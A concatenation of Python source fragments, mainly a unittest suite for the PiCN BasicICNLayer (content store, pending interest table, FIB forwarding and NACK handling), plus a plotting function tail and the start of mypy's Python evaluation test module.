        cbar.set_label(LABEL_CBAR)
        plt.ylabel(LABEL_Y)
        plt.xlabel(LABEL_X)
        plt.title(PLT_TITLE)
        return plt, ax
|
"""Test the Basic ICN Layer implementation"""
import multiprocessing
import time
import unittest
from PiCN.Layers.ICNLayer import BasicICNLayer
from PiCN.Layers.ICNLayer.ContentStore import ContentStoreMemoryExact
from PiCN.Layers.ICNLayer.ForwardingInformationBase import ForwardingInformationBaseMemoryPrefix
from PiCN.Layers.ICNLayer.PendingInterestTable import PendingInterstTableMemoryExact
from PiCN.Packets import Name, Interest, Content, Nack, NackReason
from PiCN.Processes import PiCNSyncDataStructFactory
class test_BasicICNLayer(unittest.TestCase):
"""Test the Basic ICN Layer implementation"""
def setUp(self):
#setup icn_layer
self.icn_layer = BasicICNLayer(log_level=255)
synced_data_struct_factory = PiCNSyncDataStructFactory()
synced_data_struct_factory.register("cs", ContentStoreMemoryExact)
synced_data_struct_factory.register("fib", ForwardingInformationBaseMemoryPrefix)
synced_data_struct_factory.register("pit", PendingInterstTableMemoryExact)
synced_data_struct_factory.create_manager()
cs = synced_data_struct_factory.manager.cs()
fib = synced_data_struct_factory.manager.fib()
pit = synced_data_struct_factory.manager.pit()
cs.set_cs_timeout(2)
pit.set_pit_timeout(2)
pit.set_pit_retransmits(2)
self.icn_layer.cs = cs
self.icn_layer.fib = fib
self.icn_layer.pit = pit
#setup queues icn_routing layer
self.queue1_icn_routing_up = multiprocessing.Queue()
self.queue1_icn_routing_down = multiprocessing.Queue()
#add queues to ICN layer
self.icn_layer.queue_from_lower = self.queue1_icn_routing_up
self.icn_layer.queue_to_lower = self.queue1_icn_routing_down
def tearDown(self):
self.icn_layer.stop_process()
def test_ICNLayer_interest_forward_basic(self):
"""Test ICN layer with no CS and PIT entry"""
self.icn_layer.start_process()
to_faceid = 1
from_faceid = 2
#Add entry to the fib
name = Name("/test/data")
interest = Interest("/test/data")
self.icn_layer.fib.add_fib_entry(name, [to_faceid], static=True)
#forward entry
self.queue1_icn_routing_up.put([from_faceid, interest])
try:
faceid, data = self.queue1_icn_routing_down.get(timeout=2.0)
except:
self.fail()
#check output
self.assertEqual(faceid, to_faceid)
self.assertEqual(data, interest)
#check data structures
self.assertEqual(self.icn_layer.cs.get_container_size(), 0)
self.assertEqual(self.icn_layer.fib.get_container_size(), 1)
self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
self.assertEqual(self.icn_layer.fib.find_fib_entry(name).faceid, [to_faceid])
self.assertEqual(self.icn_layer.fib.find_fib_entry(name).name, name)
self.assertEqual(self.icn_layer.pit.find_pit_entry(name).faceids[0], from_faceid)
self.assertEqual(self.icn_layer.pit.find_pit_entry(name).name, name)
def test_ICNLayer_interest_forward_longest_match(self):
"""Test ICN layer with no CS and no PIT entry and longest match"""
self.icn_layer.start_process()
to_face_id = 1
from_face_id = 2
#Add entry to the fib
name = Name("/test")
interest = Interest("/test/data")
self.icn_layer.fib.add_fib_entry(name, [to_face_id], static=True)
#forward entry
self.queue1_icn_routing_up.put([from_face_id, interest])
try:
face_id, data = self.queue1_icn_routing_down.get(timeout=2.0)
except:
self.fail()
#check output
self.assertEqual(face_id, to_face_id)
self.assertEqual(data, interest)
#check data structures
self.assertEqual(self.icn_layer.cs.get_container_size(), 0)
self.assertEqual(self.icn_layer.fib.get_container_size(), 1)
self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
self.assertEqual(self.icn_layer.fib.find_fib_entry(name).faceid, [to_face_id])
self.assertEqual(self.icn_layer.fib.find_fib_entry(name).name, name)
self.assertEqual(self.icn_layer.pit.find_pit_entry(interest.name).faceids[0], from_face_id)
self.assertEqual(self.icn_layer.pit.find_pit_entry(interest.name).name, interest.name)
def test_ICNLayer_interest_forward_deduplication(self):
"""Test ICN layer with no CS and no PIT entry and deduplication"""
self.icn_layer.start_process()
to_face_id = 1
from_face_id_1 = 2
from_face_id_2 = 3
# Add entry to the fib
name = Name("/test")
interest1 = Interest("/test/data")
interest2 = Interest("/test/data")
self.icn_layer.fib.add_fib_entry(name, [to_face_id])
# forward entry
self.queue1_icn_routing_up.put([from_face_id_1, interest1])
try:
face_id, data = self.queue1_icn_routing_down.get(timeout=2.0)
except:
self.fail()
self.queue1_icn_routing_up.put([from_face_id_2, interest2], block=True)
self.assertTrue(self.queue1_icn_routing_down.empty())
time.sleep(3)
# check output
self.assertEqual(face_id, to_face_id)
self.assertEqual(data, interest1)
time.sleep(0.3) # sleep required, since there is no blocking get before the checks
# check data structures
self.assertEqual(self.icn_layer.cs.get_container_size(), 0)
self.assertEqual(self.icn_layer.fib.get_container_size(), 1)
self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
self.assertEqual(self.icn_layer.fib.find_fib_entry(name).faceid, [to_face_id])
self.assertEqual(self.icn_layer.fib.find_fib_entry(name).name, name)
self.assertEqual(len(self.icn_layer.pit.find_pit_entry(interest1.name).faceids), 2)
self.assertEqual(self.icn_layer.pit.find_pit_entry(interest1.name).faceids, [from_face_id_1, from_face_id_2])
self.assertEqual(self.icn_layer.pit.find_pit_entry(interest1.name).name, interest1.name)
def test_ICNLayer_interest_forward_content_match(self):
    """Test ICN layer with CS entry matching.

    An interest whose name exactly matches a cached content object must be
    answered from the CS, back to the requesting face.
    """
    self.icn_layer.start_process()
    from_face_id = 2
    interest = Interest("/test/data")
    #add content
    content = Content("/test/data")
    self.icn_layer.cs.add_content_object(content)
    #request content
    self.queue1_icn_routing_up.put([from_face_id, interest])
    #get content
    try:
        face_id, data = self.queue1_icn_routing_down.get(timeout=2.0)
    except:  # timeout -> CS did not answer
        self.fail()
    # Content must be returned to the face the interest came from.
    self.assertEqual(data, content)
    self.assertEqual(face_id, from_face_id)
def test_ICNLayer_interest_forward_content_no_match(self):
    """Test ICN layer with CS entry no match.

    The cached content "/test/data" must NOT answer the longer name
    "/test/data/bla"; the interest is forwarded via the FIB instead.
    """
    self.icn_layer.start_process()
    to_face_id = 1
    from_face_id = 2
    interest = Interest("/test/data/bla")
    name = Name("/test/data")
    self.icn_layer.fib.add_fib_entry(name, [to_face_id], static=True)
    #add content
    content = Content("/test/data")
    self.icn_layer.cs.add_content_object(content)
    #request content
    self.queue1_icn_routing_up.put([from_face_id, interest])
    #get data from fib
    try:
        face_id, data = self.queue1_icn_routing_down.get(timeout=2.0)
    except:  # timeout -> interest was not forwarded
        self.fail()
    # Bugfix: the original used assertTrue(a, b), where b is merely the
    # failure *message*, so these checks passed for any truthy value.
    # assertEqual is what was intended.
    self.assertEqual(data, interest)
    self.assertEqual(face_id, to_face_id)
    self.assertTrue(self.queue1_icn_routing_up.empty())
    self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
    self.assertEqual(self.icn_layer.pit.find_pit_entry(interest.name).name, interest.name)
def test_ICNLayer_content_no_pit(self):
    """Test receiving a content object with no PIT entry.

    Unsolicited content must be dropped: nothing may appear downstream.
    """
    self.icn_layer.start_process()
    from_face_id = 2
    content = Content("/test/data")
    self.queue1_icn_routing_up.put([from_face_id, content])
    # No PIT entry -> the content is discarded, not forwarded.
    self.assertTrue(self.queue1_icn_routing_down.empty())
def test_ICNLayer_content_pit(self):
    """Test receiving a content object with PIT entry.

    Content arriving on the outgoing face of a pending interest must be
    delivered back to the face recorded in the PIT.
    """
    self.icn_layer.start_process()
    content_in_face_id = 1
    from_face_id = 2
    name = Name("/test/data")
    content = Content("/test/data")
    self.icn_layer.pit.add_pit_entry(name, from_face_id, content_in_face_id, None, None)
    self.queue1_icn_routing_up.put([content_in_face_id, content])
    try:
        face_id, data = self.queue1_icn_routing_down.get(timeout=2.0)
    except:  # timeout -> content was not delivered
        self.fail()
    self.assertEqual(face_id, from_face_id)
    self.assertEqual(data, content)
def test_ICNLayer_content_two_pit_entries(self):
    """Test receiving a content object with two PIT entries.

    One incoming content object must be fanned out to both faces that
    requested it.
    """
    self.icn_layer.start_process()
    content_in_face_id = 1
    from_face_id_1 = 2
    from_face_id_2 = 3
    name = Name("/test/data")
    content = Content("/test/data")
    self.icn_layer.pit.add_pit_entry(name, from_face_id_1, content_in_face_id, None, False)
    self.icn_layer.pit.add_pit_entry(name, from_face_id_2, content_in_face_id, None, False)
    self.queue1_icn_routing_up.put([content_in_face_id, content])
    try:
        face_id_1, data1 = self.queue1_icn_routing_down.get(timeout=2.0)
    except:  # timeout -> first copy missing
        self.fail()
    self.assertEqual(face_id_1, from_face_id_1)
    self.assertEqual(data1, content)
    # Second copy for the second requesting face.
    face_id_2, data2 = self.queue1_icn_routing_down.get()
    self.assertEqual(face_id_2, from_face_id_2)
    self.assertEqual(data2, content)
def test_ICNLayer_ageing_pit(self):
    """Test PIT ageing.

    Each ageing() call retransmits the pending interest; after the
    retransmission budget is exhausted the PIT entry is removed silently
    (no PIT-timeout NACK any more, see comment at the bottom).
    """
    self.icn_layer.start_process()
    from_face_id_1 = 1
    to_face_id = 2
    name = Name("/test/data")
    interest = Interest(name)
    self.icn_layer.fib.add_fib_entry(name, [to_face_id])
    self.icn_layer.pit.add_pit_entry(name, from_face_id_1, to_face_id, interest, False)
    self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
    self.assertEqual(self.icn_layer.pit.find_pit_entry(name).name, name)
    # test retransmit 1
    self.icn_layer.ageing()
    time.sleep(0.1)
    self.assertFalse(self.icn_layer.queue_to_lower.empty())
    try:
        rface_id, rinterest = self.icn_layer.queue_to_lower.get(timeout=2.0)
    except:  # timeout -> no retransmission happened
        self.fail()
    self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
    self.assertEqual(rface_id, to_face_id)
    self.assertEqual(rinterest, interest)
    # test retransmit 2
    self.icn_layer.ageing()
    time.sleep(0.1)
    self.assertFalse(self.icn_layer.queue_to_lower.empty())
    try:
        rface_id, rinterest = self.icn_layer.queue_to_lower.get(timeout=2.0)
    except:
        self.fail()
    self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
    self.assertEqual(rface_id, to_face_id)
    self.assertEqual(rinterest, interest)
    # Wait for timeout
    time.sleep(2)
    # test retransmit 3 to get number of retransmit
    self.icn_layer.ageing()
    time.sleep(0.1)
    self.assertFalse(self.icn_layer.queue_to_lower.empty())
    try:
        rface_id, rinterest = self.icn_layer.queue_to_lower.get(timeout=2.0)
    except:
        self.fail()
    self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
    self.assertEqual(rface_id, to_face_id)
    self.assertEqual(rinterest, interest)
    # test remove pit entry
    self.icn_layer.ageing()
    # nack = self.icn_layer.queue_to_lower.get(timeout=8.0) # invalid, no PIT Timeout Nack anymore
    # self.assertEqual(nack, [1, Nack(rinterest.name, NackReason.PIT_TIMEOUT, rinterest)])
    # Entry is dropped without emitting anything downstream.
    self.assertTrue(self.icn_layer.queue_to_lower.empty())
    self.assertEqual(self.icn_layer.pit.get_container_size(), 0)
def test_ICNLayer_ageing_cs(self):
    """Test CS ageing and static entries.

    A non-static entry expires after its lifetime; a static entry survives
    ageing indefinitely.
    """
    self.icn_layer.start_process()
    name1 = Name("/test/data")
    content1 = Content(name1, "HelloWorld")
    name2 = Name("/data/test")
    content2 = Content(name2, "Goodbye")
    self.icn_layer.cs.add_content_object(content1)
    self.icn_layer.cs.add_content_object(content2, static=True)  # static -> never aged out
    self.assertEqual(self.icn_layer.cs.get_container_size(), 2)
    self.assertEqual(self.icn_layer.cs.find_content_object(name1).content, content1)
    self.assertEqual(self.icn_layer.cs.find_content_object(name2).content, content2)
    #Test aging 1
    self.icn_layer.ageing()
    self.assertEqual(self.icn_layer.cs.get_container_size(), 2)
    self.assertEqual(self.icn_layer.cs.find_content_object(name1).content, content1)
    self.assertEqual(self.icn_layer.cs.find_content_object(name2).content, content2)
    time.sleep(2)
    # Test aging 2
    self.icn_layer.ageing()
    # Only the static entry remains after the lifetime elapsed.
    self.assertEqual(self.icn_layer.cs.get_container_size(), 1)
    self.assertEqual(self.icn_layer.cs.find_content_object(name2).content, content2)
def test_ICNLayer_content_from_app_layer_no_pit(self):
    """get content from app layer when there is no pit entry available.

    Unsolicited content coming down from the application layer must be
    dropped, not forwarded to the network.
    """
    queue_to_higher = multiprocessing.Queue()
    queue_from_higher = multiprocessing.Queue()
    self.icn_layer.queue_to_higher = queue_to_higher
    self.icn_layer.queue_from_higher = queue_from_higher
    self.icn_layer.start_process()
    n = Name("/test/data")
    c = Content(n, "HelloWorld")
    self.icn_layer.queue_from_higher.put([0, c])
    time.sleep(1)  # give the layer process time to (not) react
    self.assertTrue(self.queue1_icn_routing_down.empty())
def test_ICNLayer_content_from_app_layer(self):
    """get content from app layer when there is a pit entry available.

    Content produced by the app must be forwarded to the face stored in
    the matching PIT entry.
    """
    queue_to_higher = multiprocessing.Queue()
    queue_from_higher = multiprocessing.Queue()
    self.icn_layer.queue_to_higher = queue_to_higher
    self.icn_layer.queue_from_higher = queue_from_higher
    self.icn_layer.start_process()
    face_id = 1
    n = Name("/test/data")
    self.icn_layer.pit.add_pit_entry(n, face_id, -1)  # -1: outgoing face is the local app
    self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
    c = Content(n, "HelloWorld")
    self.icn_layer.queue_from_higher.put([0, c])
    try:
        data = self.icn_layer.queue_to_lower.get(timeout=2.0)
    except:  # timeout -> content was not forwarded
        self.fail()
    self.assertEqual(data, [face_id, c])
def test_ICNLayer_content_to_app_layer_no_pit(self):
    """get content to app layer no pit.

    Without a local-app PIT entry, content from the network must not be
    passed up to the application layer.
    """
    queue_to_higher = multiprocessing.Queue()
    queue_from_higher = multiprocessing.Queue()
    self.icn_layer.queue_to_higher = queue_to_higher
    self.icn_layer.queue_from_higher = queue_from_higher
    self.icn_layer.start_process()
    from_face_id = 1
    n = Name("/test/data")
    c = Content(n, "HelloWorld")
    self.icn_layer.queue_from_lower.put([from_face_id, c])
    time.sleep(1)  # give the layer process time to (not) react
    self.assertTrue(self.icn_layer.queue_to_higher.empty())
def test_ICNLayer_content_to_app_layer(self):
    """get content to app layer.

    A PIT entry flagged local_app routes incoming content up to the
    application layer instead of to a network face.
    """
    queue_to_higher = multiprocessing.Queue()
    queue_from_higher = multiprocessing.Queue()
    self.icn_layer.queue_to_higher = queue_to_higher
    self.icn_layer.queue_from_higher = queue_from_higher
    self.icn_layer.start_process()
    face_id = -1  # -1 denotes the local application face
    from_face_id = 1
    n = Name("/test/data")
    self.icn_layer.pit.add_pit_entry(n, face_id, -1, interest=None, local_app=True)
    self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
    c = Content(n, "HelloWorld")
    self.icn_layer.queue_from_lower.put([from_face_id, c])
    try:
        data = self.icn_layer.queue_to_higher.get(timeout=2.0)
    except:  # timeout -> content never reached the app layer
        self.fail()
    self.assertEqual(data, [1, c])
def test_ICNLayer_interest_from_app_layer_no_pit(self):
    """Test sending and interest message from APP with no PIT entry.

    The interest must be forwarded via the FIB and the resulting PIT entry
    must be marked as originating from the local app.
    """
    queue_to_higher = multiprocessing.Queue()
    queue_from_higher = multiprocessing.Queue()
    self.icn_layer.queue_to_higher = queue_to_higher
    self.icn_layer.queue_from_higher = queue_from_higher
    self.icn_layer._interest_to_app=True
    self.icn_layer.start_process()
    face_id = 1
    n = Name("/test/data")
    i = Interest(n)
    self.icn_layer.fib.add_fib_entry(n, [face_id], True)
    self.icn_layer.queue_from_higher.put([0, i])
    try:
        to_faceid, data = self.icn_layer.queue_to_lower.get(timeout=2.0)
    except:  # timeout -> interest was not forwarded
        self.fail()
    self.assertEqual(to_faceid, face_id)
    self.assertEqual(i, data)
    self.assertEqual(self.icn_layer.pit.find_pit_entry(n).interest, i)
    # local_app flag marks that the answer must go back to the app layer.
    self.assertTrue(self.icn_layer.pit.find_pit_entry(n).local_app[0])
def test_ICNLayer_interest_from_app_layer_pit(self):
    """Test sending and interest message from APP with a PIT entry --> interest not for higher layer."""
    queue_to_higher = multiprocessing.Queue()
    queue_from_higher = multiprocessing.Queue()
    self.icn_layer.queue_to_higher = queue_to_higher
    self.icn_layer.queue_from_higher = queue_from_higher
    self.icn_layer._interest_to_app=True
    self.icn_layer.start_process()
    face_id = 1
    from_face_id = 2
    n = Name("/test/data")
    i = Interest(n)
    self.icn_layer.fib.add_fib_entry(n, [face_id], True)
    # A network-originated PIT entry already exists for the same name.
    self.icn_layer.pit.add_pit_entry(n, from_face_id, face_id, i, local_app=False)
    self.assertFalse(self.icn_layer.pit.find_pit_entry(n).local_app[0])
    self.icn_layer.queue_from_higher.put([0, i])
    try:
        to_face_id, data = self.icn_layer.queue_to_lower.get(timeout=2.0)
    except:  # timeout -> interest was not forwarded
        self.fail()
    self.assertEqual(to_face_id, face_id)
    self.assertEqual(i, data)
    self.assertEqual(self.icn_layer.pit.find_pit_entry(n).interest, i)
    self.assertFalse(self.icn_layer.pit.find_pit_entry(n).local_app[0]) #Just forward, not from local app
def test_ICNLayer_interest_to_app_layer_no_pit(self):
    """Test sending and interest message from APP with no PIT entry.

    With _interest_to_app enabled, a network interest is handed up to the
    application layer and a PIT entry is created.
    """
    queue_to_higher = multiprocessing.Queue()
    queue_from_higher = multiprocessing.Queue()
    self.icn_layer.queue_to_higher = queue_to_higher
    self.icn_layer.queue_from_higher = queue_from_higher
    self.icn_layer._interest_to_app = True
    self.icn_layer.start_process()
    face_id = 1
    from_face_id = 2
    n = Name("/test/data")
    i = Interest(n)
    self.icn_layer.fib.add_fib_entry(n, [face_id], True)
    self.icn_layer.queue_from_lower.put([from_face_id, i])
    try:
        data = self.icn_layer.queue_to_higher.get(timeout=2.0)
    except:  # timeout -> interest never reached the app layer
        self.fail()
    self.assertEqual(data[1], i)
    self.assertEqual(self.icn_layer.pit.find_pit_entry(n).interest, i)
def test_ICNLayer_interest_to_app_layer_pit(self):
    """Test sending and interest message from APP with a PIT entry."""
    queue_to_higher = multiprocessing.Queue()
    queue_from_higher = multiprocessing.Queue()
    self.icn_layer.queue_to_higher = queue_to_higher
    self.icn_layer.queue_from_higher = queue_from_higher
    self.icn_layer._interest_to_app = True
    self.icn_layer.start_process()
    face_id = [1]
    from_face_id = 2
    n = Name("/test/data")
    i = Interest(n)
    self.icn_layer.fib.add_fib_entry(n, face_id, True)
    # Existing PIT entry means the duplicate interest must be suppressed.
    self.icn_layer.pit.add_pit_entry(n, from_face_id, face_id[0], i, local_app=False)
    self.icn_layer.queue_from_lower.put([from_face_id, i])
    time.sleep(1)  # give the layer process time to (not) react
    self.assertTrue(self.icn_layer.queue_to_higher.empty()) #--> deduplication by pit entry
def test_ICNLayer_interest_to_app_layer_cs(self):
    """Test sending and interest message from APP with a CS entry.

    A CS hit answers the interest directly; nothing is handed to the app.
    """
    queue_to_higher = multiprocessing.Queue()
    queue_from_higher = multiprocessing.Queue()
    self.icn_layer.queue_to_higher = queue_to_higher
    self.icn_layer.queue_from_higher = queue_from_higher
    self.icn_layer._interest_to_app = True
    self.icn_layer.start_process()
    face_id = 1
    from_face_id = 2
    n = Name("/test/data")
    i = Interest(n)
    c = Content(n, "Hello World")
    self.icn_layer.fib.add_fib_entry(n, [face_id], True)
    self.icn_layer.cs.add_content_object(c)
    self.icn_layer.queue_from_lower.put([from_face_id, i])
    try:
        to_face_id, data = self.icn_layer.queue_to_lower.get(timeout=2.0)
    except:  # timeout -> CS did not answer
        self.fail()
    self.assertEqual(to_face_id, from_face_id)
    self.assertEqual(data, c)
    self.assertTrue(self.icn_layer.queue_to_higher.empty()) # --> was answered by using Content from cache
def test_ICNLayer_issue_nack_no_content_no_fib_from_lower(self):
    """Test if ICN Layer issues Nack if no content and no fib entry is available from lower."""
    self.icn_layer.start_process()
    interest = Interest("/test/data")
    # Expected NACK: no route, echoing the original interest.
    nack = Nack(interest.name, NackReason.NO_ROUTE, interest=interest)
    self.icn_layer.queue_from_lower.put([1, interest])
    try:
        data = self.icn_layer.queue_to_lower.get(timeout=2.0)
    except:  # timeout -> no NACK was issued
        self.fail()
    fid = data[0]
    packet = data[1]
    # NACK goes back to the face the interest came from.
    self.assertEqual(fid, 1)
    self.assertEqual(packet, nack)
def test_ICNLayer_issue_nack_no_content_no_fib_from_higher(self):
    """Test if ICN Layer issues Nack if no content and no fib entry is available from higher."""
    queue_to_higher = multiprocessing.Queue()
    queue_from_higher = multiprocessing.Queue()
    self.icn_layer.queue_to_higher = queue_to_higher
    self.icn_layer.queue_from_higher = queue_from_higher
    self.icn_layer.start_process()
    interest = Interest("/test/data")
    nack = Nack(interest.name, NackReason.NO_ROUTE, interest=interest)
    self.icn_layer.queue_from_higher.put([1, interest])
    try:
        # NACK is returned upward since the interest came from the app layer.
        data = self.icn_layer.queue_to_higher.get(timeout=2.0)
    except:  # timeout -> no NACK was issued
        self.fail()
    fid = data[0]
    packet = data[1]
    self.assertEqual(fid, 1)
    self.assertEqual(packet, nack)
#TODO CHECK
def test_ICNLayer_handling_nack_no_fib(self):
    """Test if ICN Layer handles a Nack correctly if no fib entry is available.

    With no alternative route, the NACK is propagated back to the face
    stored in the PIT entry.
    """
    self.icn_layer.start_process()
    n1 = Name("/test/data")
    i1 = Interest(n1)
    fid_1 = 1
    nack_1 = Nack(n1, NackReason.NO_ROUTE, interest=i1)
    self.icn_layer.pit.add_pit_entry(n1, fid_1, -1, i1, False)
    self.icn_layer.queue_from_lower.put([2, nack_1])
    try:
        data = self.icn_layer.queue_to_lower.get(timeout=2.0)
        print(data)
    except:  # timeout -> NACK was not propagated
        self.fail()
    self.assertEqual(data[0], fid_1)
    self.assertEqual(data[1], nack_1)
#TODO Fix the error
def test_ICNLayer_handling_nack_next_fib(self):
    """Test if ICN Layer handles a Nack correctly if further fib entry is available.

    On each NACK the layer retries the next (shorter-prefix) FIB match;
    only when all routes are exhausted is the NACK sent to the requester.
    """
    self.icn_layer.start_process()
    n1 = Name("/test/data/d1")
    i1 = Interest(n1)
    from_fid = 1
    to_fib1 = 2
    to_fib2 = 3
    to_fib3 = 4
    nack_1 = Nack(n1, NackReason.NO_ROUTE, interest=i1)
    self.icn_layer.pit.add_pit_entry(n1, from_fid, to_fib3, i1, None)
    self.icn_layer.pit.add_used_fib_face(n1, [to_fib3])  # mark first route as already tried
    self.icn_layer.fib.add_fib_entry(Name("/test"), [to_fib1])
    self.icn_layer.fib.add_fib_entry(Name("/test/data"), [to_fib2])
    self.icn_layer.fib.add_fib_entry(Name("/test/data/d1"), [to_fib3]) #assuming this entry was used first and is active when nack arrives
    self.icn_layer.queue_from_lower.put([to_fib3, nack_1])
    try:
        data = self.icn_layer.queue_to_lower.get(timeout=2.0)
    except:  # timeout -> no retry on the next route
        self.fail()
    self.assertEqual(data[0], to_fib2)
    self.assertEqual(data[1], i1)
    #check testing second path
    self.icn_layer.queue_from_lower.put([to_fib2, nack_1])
    try:
        data = self.icn_layer.queue_to_lower.get(timeout=2.0)
    except:
        self.fail()
    self.assertEqual(data[0], to_fib1)
    self.assertEqual(data[1], i1)
    #check no path left
    self.icn_layer.queue_from_lower.put([to_fib1, nack_1])
    try:
        data = self.icn_layer.queue_to_lower.get(timeout=2.0)
    except:
        self.fail()
    # All routes exhausted: NACK goes back to the original requester.
    self.assertEqual(data[0], from_fid)
    self.assertEqual(data[1], nack_1)
def test_multicast_and_nack_handling(self):
    """Test if a multicast works, and if the nack counter for the multicast works.

    The FIB entry lists faces [2, 3, 4]; each NACK advances the interest
    to the next face in the list.
    """
    i1 = Interest("/test/data")
    n1 = Nack(i1.name, NackReason.NO_CONTENT, i1)
    self.icn_layer.start_process()
    self.icn_layer.fib.add_fib_entry(i1.name, [2,3,4])
    self.icn_layer.queue_from_lower.put([1, i1])
    d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
    self.assertEqual([2, i1], d1)  # first face tried
    self.assertTrue(self.icn_layer.queue_to_lower.empty())
    self.icn_layer.queue_from_lower.put([2, n1])
    d2 = self.icn_layer.queue_to_lower.get(timeout=4.0)
    print(d2)
    self.assertEqual([3, i1], d2)  # second face after first NACK
    self.assertTrue(self.icn_layer.queue_to_lower.empty())
    self.icn_layer.queue_from_lower.put([3, n1])
    try:
        d3 = self.icn_layer.queue_to_lower.get(timeout=4.0)
    except:  # timeout -> third face was not tried
        self.fail()
    print(d3)
    self.assertEqual([4, i1], d3)  # third face after second NACK
    ##
    #
    #
    # self.assertTrue(self.icn_layer.queue_to_lower.empty())
    #
    # self.icn_layer.queue_from_lower.put([2, n1])
    # d3 = self.icn_layer.queue_to_lower.get(timeout=2.0)
    # self.assertEqual([1, n1], d3)
def test_communicating_vessels_forwarding_strategy(self):
    """This function test the whole idea of forwarding strategy with multiple PIT entries
    and multiple FIB entries with multiple matches in PIT and FIB and also it checks the NACK handler in case of one face was nacked in a fib entry or all faces
    of a fib entry was nacked"""
    ab_name = Name("/a/b")
    i1 = Interest("/a/b/x")
    i2 = Interest("/a/b/y")
    i3 = Interest("/a/b/z")
    i4 = Interest("/a/b/w")
    i5 = Interest("/a/b/k")
    i6 = Interest("/x/y")
    i7 = Interest("/x")
    i8 = Interest("/m/n")
    i9 = Interest("/o/p")
    n1 = Nack(i1.name, NackReason.NO_CONTENT, i1)
    self.icn_layer.start_process()
    self.icn_layer.fib.add_fib_entry(ab_name, [1, 2, 3])
    # here the fib table has many entries which contains the prefix of ab_name
    self.icn_layer.fib.add_fib_entry(i6.name, [1, 4])
    self.icn_layer.fib.add_fib_entry(i7.name, [2, 3])
    self.icn_layer.fib.add_fib_entry(i8.name, [1, 5])
    self.icn_layer.fib.add_fib_entry(i9.name, [5, 3])
    #send the first interest ("/a/b/x") with no matching PIT entry. The outgoing face should be "1"
    #as it is the first Interest and there is no pending Interests to affect the decision
    self.icn_layer.queue_from_lower.put([10, i1])
    d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
    pit_entry = self.icn_layer.pit.find_pit_entry(i1.name)
    self.assertEqual([1], pit_entry.outgoing_faces)
    #send the second Interest ("/a/b/y") while the PIT entry of ("a/b/x") was not removed yet from the PIT
    #The interest should be sent to face "2" as the occupancy of face "1" is higher than the occupancy of "2" and "3"
    self.icn_layer.queue_from_lower.put([10, i2])
    d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
    pit_entry = self.icn_layer.pit.find_pit_entry(i2.name)
    self.assertEqual([2], pit_entry.outgoing_faces)
    #send bunch of Interests which are ("/x/y"), ("/x"), ("/m/n"),("/o/p"). In this case and because there is no matching entry in PIT for any of them.
    # each one will be sent to the first avaialble face in FIB. So i6 will be sent to 1. i7 will be sent to 2...
    self.icn_layer.queue_from_lower.put([10, i6])
    d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
    self.icn_layer.queue_from_lower.put([10, i7])
    d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
    self.icn_layer.queue_from_lower.put([10, i8])
    d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
    self.icn_layer.queue_from_lower.put([10, i9])
    d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
    # send the second Interest i3 ("/a/b/z") while the PIT entry of ("a/b/x") and ("a/b/y") was not removed yet from the PIT
    # The interest should be sent to face "3" as the occupancy of face "1" and face "2" is higher than the occupancy of "3"
    self.icn_layer.queue_from_lower.put([10, i3])
    d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
    pit_entry = self.icn_layer.pit.find_pit_entry(i3.name)
    self.assertEqual([3], pit_entry.outgoing_faces)
    # now send an interest i4 (("/a/b/w") while the previous three matching interests still exist in PIT. All faces have equal capacity so it will be sent to the first one.
    self.icn_layer.queue_from_lower.put([10, i4])
    d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
    pit_entry = self.icn_layer.pit.find_pit_entry(i4.name)
    self.assertEqual([1], pit_entry.outgoing_faces)
    # we are removing i4 and i1 from the PIT table
    self.icn_layer.pit.remove_pit_entry(i4.name)
    self.icn_layer.pit.remove_pit_entry(i1.name)
    # senf=d i5 while i2 and i3 still exist in PIT and they match i5. So the interest will be sent to face 1 because i2 is sent to 2 and i3 is sent to 3 so 2,3 have higher occupancy than 1
    self.icn_layer.queue_from_lower.put([10, i5])
    d1 = self.icn_layer.queue_to_lower.get(timeout=2.0)
    pit_entry = self.icn_layer.pit.find_pit_entry(i5.name)
    self.assertEqual([1], pit_entry.outgoing_faces)
"""Test cases for running mypy programs using a Python interpreter.
Each test case type checks a program then runs it using Python. The
output (stdout) of the program is compared to expected output. Type checking
uses full builtins and other stubs.
Note: Currently Python interpreter paths are hard coded.
Note: These test cases are *not* included in the main test suite, as including
this suite would slow down the main suite too much.
"""
import os
import os.path
import re
import sys
from tempfile import TemporaryDirectory
import pytest # type: ignore # no pytest in typeshed
from typing import List
from mypy.defaults import PYTHON3_VERSION
from mypy.test.config import test_temp_dir
from mypy.test.data import DataDrivenTestCase, DataSuite
from mypy.test.helpers import assert_string_arrays_equal, run_command
from mypy.util import try_find_python2_interpreter
from mypy import api
# Path to Python 3 interpreter
python3_path = sys.executable
program_re = re.compile(r'\b_program.py\b')
class PythonEvaluationSuite(DataSuite):
    """Data-driven suite: type check each test program, then execute it."""

    # Test-data files that drive this suite.
    files = ['pythoneval.test',
             'python2eval.test',
             'pythoneval-asyncio.test']
    # Shared temp dir so all cases reuse one mypy incremental cache.
    cache_dir = TemporaryDirectory()

    def run_case(self, testcase: DataDrivenTestCase) -> None:
        test_python_evaluation(testcase, os.path.join(self.cache_dir.name, '.mypy_cache'))
def test_python_evaluation(testcase: DataDrivenTestCase, cache_dir: str) -> None:
    """Runs Mypy in a subprocess.

    If this passes without errors, executes the script again with a given Python
    version.
    """
    assert testcase.old_cwd is not None, "test was not properly set up"
    # TODO: Enable strict optional for these tests
    mypy_cmdline = [
        '--show-traceback',
        '--no-site-packages',
        '--no-strict-optional',
        '--no-silence-site-packages',
    ]
    # Case names ending in "python2" are checked and run under Python 2.
    py2 = testcase.name.lower().endswith('python2')
